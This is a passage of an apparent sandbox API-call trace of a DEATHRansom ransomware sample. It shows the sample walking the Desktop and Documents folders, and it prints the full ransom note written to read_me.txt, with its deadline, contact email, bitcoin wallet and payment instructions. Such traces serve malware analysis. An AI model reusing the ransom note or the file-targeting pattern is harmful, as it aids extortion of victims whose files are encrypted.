pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\liVQHjNX2r.swf") returned 56 [0073.955] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa26ede70, ftCreationTime.dwHighDateTime=0x1d4cc4d, ftLastAccessTime.dwLowDateTime=0x4e4d1360, ftLastAccessTime.dwHighDateTime=0x1d4cc49, ftLastWriteTime.dwLowDateTime=0x4e4d1360, ftLastWriteTime.dwHighDateTime=0x1d4cc49, nFileSizeHigh=0x0, nFileSizeLow=0x414e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="llR6.pps", cAlternateFileName="")) returned 1 [0073.955] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\llR6.pps") returned 50 [0073.955] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecbb1eb0, ftCreationTime.dwHighDateTime=0x1d4d3e3, ftLastAccessTime.dwLowDateTime=0x961cf330, ftLastAccessTime.dwHighDateTime=0x1d4cb32, ftLastWriteTime.dwLowDateTime=0x961cf330, ftLastWriteTime.dwHighDateTime=0x1d4cb32, nFileSizeHigh=0x0, nFileSizeLow=0x9eeb, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="lm8-Yxyd.wav", cAlternateFileName="")) returned 1 [0073.955] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lm8-Yxyd.wav") returned 54 [0073.955] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3fc4ef80, ftCreationTime.dwHighDateTime=0x1d4c973, ftLastAccessTime.dwLowDateTime=0x95a6e300, ftLastAccessTime.dwHighDateTime=0x1d4d23c, ftLastWriteTime.dwLowDateTime=0x95a6e300, ftLastWriteTime.dwHighDateTime=0x1d4d23c, nFileSizeHigh=0x0, nFileSizeLow=0x15d87, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="NgqyPrC0ZV4fh.gif", cAlternateFileName="NGQYPR~1.GIF")) returned 1 [0073.955] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NgqyPrC0ZV4fh.gif") returned 59 [0073.955] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16164800, ftCreationTime.dwHighDateTime=0x1d4d3b4, ftLastAccessTime.dwLowDateTime=0x556cd2f0, ftLastAccessTime.dwHighDateTime=0x1d4d16e, ftLastWriteTime.dwLowDateTime=0x556cd2f0, ftLastWriteTime.dwHighDateTime=0x1d4d16e, nFileSizeHigh=0x0, nFileSizeLow=0xd18a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="nSA7d4lyI1Ncal5FKUi.xls", cAlternateFileName="NSA7D4~1.XLS")) returned 1 [0073.955] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\nSA7d4lyI1Ncal5FKUi.xls") returned 65 [0073.955] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe85854d0, ftCreationTime.dwHighDateTime=0x1d4c832, ftLastAccessTime.dwLowDateTime=0x3b018f30, ftLastAccessTime.dwHighDateTime=0x1d4c5fe, ftLastWriteTime.dwLowDateTime=0x3b018f30, ftLastWriteTime.dwHighDateTime=0x1d4c5fe, nFileSizeHigh=0x0, nFileSizeLow=0xc7c2, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="qIOkRC-l.flv", cAlternateFileName="")) returned 1 [0073.955] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qIOkRC-l.flv") returned 54 [0073.955] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e73d7a0, ftCreationTime.dwHighDateTime=0x1d4cd40, ftLastAccessTime.dwLowDateTime=0xb61b9360, ftLastAccessTime.dwHighDateTime=0x1d4d101, ftLastWriteTime.dwLowDateTime=0xb61b9360, ftLastWriteTime.dwHighDateTime=0x1d4d101, nFileSizeHigh=0x0, nFileSizeLow=0x9a91, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="tLYwebo5JKIgCR.avi", cAlternateFileName="TLYWEB~1.AVI")) returned 1 [0073.955] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tLYwebo5JKIgCR.avi") returned 60 [0073.955] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x796ca7b0, ftCreationTime.dwHighDateTime=0x1d4cd87, ftLastAccessTime.dwLowDateTime=0xf5d04430, ftLastAccessTime.dwHighDateTime=0x1d4cfc9, ftLastWriteTime.dwLowDateTime=0xf5d04430, ftLastWriteTime.dwHighDateTime=0x1d4cfc9, nFileSizeHigh=0x0, nFileSizeLow=0x5d4d, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="tyzbPSjZEG.avi", cAlternateFileName="TYZBPS~1.AVI")) returned 1 [0073.955] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tyzbPSjZEG.avi") returned 56 [0073.955] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73a0d470, ftCreationTime.dwHighDateTime=0x1d4d44c, ftLastAccessTime.dwLowDateTime=0x79d9dd0, ftLastAccessTime.dwHighDateTime=0x1d4d078, ftLastWriteTime.dwLowDateTime=0x79d9dd0, ftLastWriteTime.dwHighDateTime=0x1d4d078, nFileSizeHigh=0x0, nFileSizeLow=0x8448, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="V8ri.swf", cAlternateFileName="")) returned 1 [0073.955] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\V8ri.swf") returned 50 [0073.955] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9067670, ftCreationTime.dwHighDateTime=0x1d4d046, ftLastAccessTime.dwLowDateTime=0x9bf7cd10, ftLastAccessTime.dwHighDateTime=0x1d4c74b, ftLastWriteTime.dwLowDateTime=0x9bf7cd10, ftLastWriteTime.dwHighDateTime=0x1d4c74b, nFileSizeHigh=0x0, nFileSizeLow=0x17981, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="vDRPByO651DdDfm.mp3", cAlternateFileName="VDRPBY~1.MP3")) returned 1 [0073.955] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vDRPByO651DdDfm.mp3") returned 61 [0073.956] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0a22c80, ftCreationTime.dwHighDateTime=0x1d59ffd, ftLastAccessTime.dwLowDateTime=0xf0a22c80, ftLastAccessTime.dwHighDateTime=0x1d59ffd, ftLastWriteTime.dwLowDateTime=0xeed86900, ftLastWriteTime.dwHighDateTime=0x1d59ffd, nFileSizeHigh=0x0, nFileSizeLow=0x3ac00, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Wacatac_2019-11-20_23-34.exe", cAlternateFileName="WACATA~1.EXE")) returned 1 [0073.956] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Wacatac_2019-11-20_23-34.exe") returned 70 [0073.956] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x181b2ac0, ftCreationTime.dwHighDateTime=0x1d4cad7, ftLastAccessTime.dwLowDateTime=0x6553f70, ftLastAccessTime.dwHighDateTime=0x1d4d3d2, ftLastWriteTime.dwLowDateTime=0x6553f70, ftLastWriteTime.dwHighDateTime=0x1d4d3d2, nFileSizeHigh=0x0, nFileSizeLow=0x11e51, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="WiGeM.gif", cAlternateFileName="")) returned 1 [0073.956] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WiGeM.gif") returned 51 [0073.956] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfef6bf70, ftCreationTime.dwHighDateTime=0x1d4c728, ftLastAccessTime.dwLowDateTime=0xf11c4070, ftLastAccessTime.dwHighDateTime=0x1d4c762, ftLastWriteTime.dwLowDateTime=0xf11c4070, ftLastWriteTime.dwHighDateTime=0x1d4c762, nFileSizeHigh=0x0, nFileSizeLow=0x3e87, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="yEA9WuGUl0.doc", cAlternateFileName="YEA9WU~1.DOC")) returned 1 [0073.956] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\yEA9WuGUl0.doc") returned 56 [0073.956] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16d895f0, ftCreationTime.dwHighDateTime=0x1d4d0e8, ftLastAccessTime.dwLowDateTime=0x47a205d0, ftLastAccessTime.dwHighDateTime=0x1d4c7ac, ftLastWriteTime.dwLowDateTime=0x47a205d0, ftLastWriteTime.dwHighDateTime=0x1d4c7ac, nFileSizeHigh=0x0, nFileSizeLow=0x15a59, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="YQ6ihizfQJQ.bmp", cAlternateFileName="YQ6IHI~1.BMP")) returned 1 [0073.956] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YQ6ihizfQJQ.bmp") returned 57 [0073.956] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0902c0, ftCreationTime.dwHighDateTime=0x1d4c75c, ftLastAccessTime.dwLowDateTime=0x6fc3cde0, ftLastAccessTime.dwHighDateTime=0x1d4cce4, ftLastWriteTime.dwLowDateTime=0x6fc3cde0, ftLastWriteTime.dwHighDateTime=0x1d4cce4, nFileSizeHigh=0x0, nFileSizeLow=0x724e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="YYjmQ.png", cAlternateFileName="")) returned 1 [0073.956] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\YYjmQ.png") returned 51 [0073.956] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb6cea70, ftCreationTime.dwHighDateTime=0x1d4d1b2, ftLastAccessTime.dwLowDateTime=0xb63289d0, ftLastAccessTime.dwHighDateTime=0x1d4c5a8, ftLastWriteTime.dwLowDateTime=0xb63289d0, ftLastWriteTime.dwHighDateTime=0x1d4c5a8, nFileSizeHigh=0x0, nFileSizeLow=0x1a1e, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Z18u8QGOH13-Iu4LwHT.wav", cAlternateFileName="Z18U8Q~1.WAV")) returned 1 [0073.956] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Z18u8QGOH13-Iu4LwHT.wav") returned 65 [0073.956] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd727040, ftCreationTime.dwHighDateTime=0x1d4d3fc, ftLastAccessTime.dwLowDateTime=0xa84b80d0, ftLastAccessTime.dwHighDateTime=0x1d4d34d, ftLastWriteTime.dwLowDateTime=0xa84b80d0, ftLastWriteTime.dwHighDateTime=0x1d4d34d, nFileSizeHigh=0x0, nFileSizeLow=0x8ac3, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="ZeChUGPb.wav", cAlternateFileName="")) returned 1 [0073.956] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZeChUGPb.wav") returned 54 [0073.956] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdde9a0d0, ftCreationTime.dwHighDateTime=0x1d4d241, ftLastAccessTime.dwLowDateTime=0xfc7f6110, ftLastAccessTime.dwHighDateTime=0x1d4d250, ftLastWriteTime.dwLowDateTime=0xfc7f6110, ftLastWriteTime.dwHighDateTime=0x1d4d250, nFileSizeHigh=0x0, nFileSizeLow=0x8f43, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="_udXp.doc", cAlternateFileName="")) returned 1 [0073.956] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_udXp.doc") returned 51 [0073.956] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdde9a0d0, ftCreationTime.dwHighDateTime=0x1d4d241, ftLastAccessTime.dwLowDateTime=0xfc7f6110, ftLastAccessTime.dwHighDateTime=0x1d4d250, ftLastWriteTime.dwLowDateTime=0xfc7f6110, ftLastWriteTime.dwHighDateTime=0x1d4d250, nFileSizeHigh=0x0, nFileSizeLow=0x8f43, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="_udXp.doc", cAlternateFileName="")) returned 0 [0073.956] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0073.956] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\read_me.txt") returned 53 [0073.956] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x780 [0073.957] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.957] WriteFile (in: hFile=0x780, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e0e4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e0e4*=0x6b3, lpOverlapped=0x0) returned 1 [0073.958] CloseHandle (hObject=0x780) returned 1 [0073.958] GetProcessHeap () returned 0x280000 [0073.958] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b30010 | out: hHeap=0x280000) returned 1 [0073.958] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf4a37910, ftLastAccessTime.dwHighDateTime=0x1d59ffd, ftLastWriteTime.dwLowDateTime=0xf4a37910, ftLastWriteTime.dwHighDateTime=0x1d59ffd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0073.958] wnsprintfW (in: pszDest=0x8bb0138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 43 [0073.958] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0073.958] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0073.958] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b30010 [0073.958] lstrcpyW (in: lpString1=0x8b30010, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0073.958] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 45 [0073.958] QueueUserWorkItem (Function=0x40a710, Context=0x8b30010, Flags=0x0) returned 1 [0073.959] GetProcessHeap () returned 0x280000 [0073.959] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ad00c8 [0073.959] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*") returned 45 [0073.960] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf4a37910, ftLastAccessTime.dwHighDateTime=0x1d59ffd, ftLastWriteTime.dwLowDateTime=0xf4a37910, ftLastWriteTime.dwHighDateTime=0x1d59ffd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.960] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\.") returned 45 [0073.960] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.960] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.960] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf4a37910, ftLastAccessTime.dwHighDateTime=0x1d59ffd, ftLastWriteTime.dwLowDateTime=0xf4a37910, ftLastWriteTime.dwHighDateTime=0x1d59ffd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.960] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\..") returned 46 [0073.960] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.960] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcfcfcf0, ftCreationTime.dwHighDateTime=0x1d4c729, ftLastAccessTime.dwLowDateTime=0x3ba5af10, ftLastAccessTime.dwHighDateTime=0x1d4cb3b, ftLastWriteTime.dwLowDateTime=0x3ba5af10, ftLastWriteTime.dwHighDateTime=0x1d4cb3b, nFileSizeHigh=0x0, nFileSizeLow=0xeac2, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="-H6-nCLy9iKddFOfC7X.ots", cAlternateFileName="-H6-NC~1.OTS")) returned 1 [0073.960] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\-H6-nCLy9iKddFOfC7X.ots") returned 67 [0073.960] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc102ff30, ftCreationTime.dwHighDateTime=0x1d5486a, ftLastAccessTime.dwLowDateTime=0xdbb2e1f0, ftLastAccessTime.dwHighDateTime=0x1d56210, ftLastWriteTime.dwLowDateTime=0xdbb2e1f0, ftLastWriteTime.dwHighDateTime=0x1d56210, nFileSizeHigh=0x0, nFileSizeLow=0x16b31, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="0ZG0M.xlsx", cAlternateFileName="0ZG0M~1.XLS")) returned 1 [0073.960] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0ZG0M.xlsx") returned 54 [0073.960] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8780fab0, ftCreationTime.dwHighDateTime=0x1d57bbd, ftLastAccessTime.dwLowDateTime=0x42b4d640, ftLastAccessTime.dwHighDateTime=0x1d53fd1, ftLastWriteTime.dwLowDateTime=0x42b4d640, ftLastWriteTime.dwHighDateTime=0x1d53fd1, nFileSizeHigh=0x0, nFileSizeLow=0xa858, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="1hd5ypV.docx", cAlternateFileName="1HD5YP~1.DOC")) returned 1 [0073.960] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1hd5ypV.docx") returned 56 [0073.960] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70338e90, ftCreationTime.dwHighDateTime=0x1d52c3a, ftLastAccessTime.dwLowDateTime=0x499ba9c0, ftLastAccessTime.dwHighDateTime=0x1d5976f, ftLastWriteTime.dwLowDateTime=0x499ba9c0, ftLastWriteTime.dwHighDateTime=0x1d5976f, nFileSizeHigh=0x0, nFileSizeLow=0x12b70, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="2TTC6.docx", cAlternateFileName="2TTC6~1.DOC")) returned 1 [0073.960] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2TTC6.docx") returned 54 [0073.960] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4460e4d0, ftCreationTime.dwHighDateTime=0x1d58cce, ftLastAccessTime.dwLowDateTime=0x83c8afb0, ftLastAccessTime.dwHighDateTime=0x1d595be, ftLastWriteTime.dwLowDateTime=0x83c8afb0, ftLastWriteTime.dwHighDateTime=0x1d595be, nFileSizeHigh=0x0, nFileSizeLow=0x9843, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="3V6OZ8oC-7w9cG YFL.docx", cAlternateFileName="3V6OZ8~1.DOC")) returned 1 [0073.960] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\3V6OZ8oC-7w9cG YFL.docx") returned 67 [0073.960] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10dd3aa0, ftCreationTime.dwHighDateTime=0x1d568de, ftLastAccessTime.dwLowDateTime=0x198731d0, ftLastAccessTime.dwHighDateTime=0x1d53038, ftLastWriteTime.dwLowDateTime=0x198731d0, ftLastWriteTime.dwHighDateTime=0x1d53038, nFileSizeHigh=0x0, nFileSizeLow=0x10c45, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="5O1Ef9xbUFGU5rk38I.xlsx", cAlternateFileName="5O1EF9~1.XLS")) returned 1 [0073.960] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5O1Ef9xbUFGU5rk38I.xlsx") returned 67 [0073.960] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b004ce0, ftCreationTime.dwHighDateTime=0x1d593f3, ftLastAccessTime.dwLowDateTime=0x4133ce40, ftLastAccessTime.dwHighDateTime=0x1d530ac, ftLastWriteTime.dwLowDateTime=0x4133ce40, ftLastWriteTime.dwHighDateTime=0x1d530ac, nFileSizeHigh=0x0, nFileSizeLow=0x16636, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="5Q7wz4WHOl.xlsx", cAlternateFileName="5Q7WZ4~1.XLS")) returned 1 [0073.960] wnsprintfW (in: 